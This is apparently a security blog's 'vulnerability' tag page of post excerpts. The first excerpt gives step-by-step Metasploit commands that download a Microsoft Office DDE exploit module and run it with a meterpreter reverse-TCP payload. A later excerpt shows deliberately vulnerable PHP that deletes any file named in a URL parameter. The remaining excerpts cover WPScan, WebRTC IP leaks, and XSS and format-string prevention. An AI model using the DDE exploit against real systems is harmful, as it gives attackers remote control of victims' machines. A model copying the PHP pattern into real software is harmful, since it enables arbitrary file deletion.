Tag: vulnerability

Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download the module:

    wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Move the module into the framework:

    mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Open Metasploit and load the exploit:

    msfconsole
    reload_all
    use exploit/windows/dde_delivery

Set the server host:

    set SRVHOST 192.168.1.10

Choose a payload and run it:

    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.10
    set LPORT 443
    exploit

…

Vulnerabilities

Black box WordPress vulnerability scanner

WPScan is a black box WordPress vulnerability scanner.

WPSCAN ARGUMENTS

    --update                        Update the database to the latest version.
    --url | -u                      The WordPress URL/domain to scan.
    --force | -f                    Forces WPScan to not check if the remote site is running WordPress.
    --enumerate | -e [option(s)]    Enumeration.
        option:
        u    usernames from id 1 to 10 …

Add-ons, Anonymity, Browsers, Chrome, Firefox, Protection, VPN

WebRTC Vulnerability leaks Real IP Address

WebRTC Vulnerability leaks Real IP Address of VPN User. This security flaw can reveal your real IP address, even if you’re using a VPN, and it’s easy to exploit.

To check if you are safe or not:

> Visit https://diafygi.github.io/webrtc-ips/ while you are connected to your VPN.
> If your real IP address is in …

Injection, PHP, Vulnerabilities

PHP Command Injection Vulnerability in Web applications

Create a new PHP file, name it test_command_injection.php, and save it inside Apache’s htdocs directory:

    <?php
    if(isset($_GET['filename'])) {
        $filename = $_GET['filename'];
        if(file_exists($filename)) {
            unlink($filename);
        }
    }

Open your favorite browser and open the URL: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion

As you can see you could delete any file in the …

Exploitation, Metasploit, Vulnerabilities

Vulnerability scanning and Metasploit

A vulnerability scanner is an automated computer program designed to assess computers, computer systems, networks or applications and look for weaknesses. The program probes a system by sending data to it and analyzing the responses received. To identify any vulnerabilities on the target system, a vulnerability scanner uses its vulnerability database as reference. Don’t forget …

Format String Vulnerabilities, PHP, WEB

Prevent Format String Vulnerabilities in PHP

Format string exploits can be used to crash a program (DoS) or to execute harmful code. The cause of this vulnerability is the use of unfiltered user input in functions such as printf() or sprintf(). The attacker could use this kind of vulnerability to launch denial-of-service attacks, use the %x format specifier to print sections …

Cross-Site Scripting, PHP, WEB

Preventing Cross-Site Scripting (XSS) in PHP

Cross-site scripting (XSS) is a type of vulnerability found in web applications. It occurs when a web application takes data from a user and uses it without validating, checking, encoding or filtering it. This vulnerability enables attackers to inject malicious client-side scripts into a trusted web site. The end user’s browser will execute the …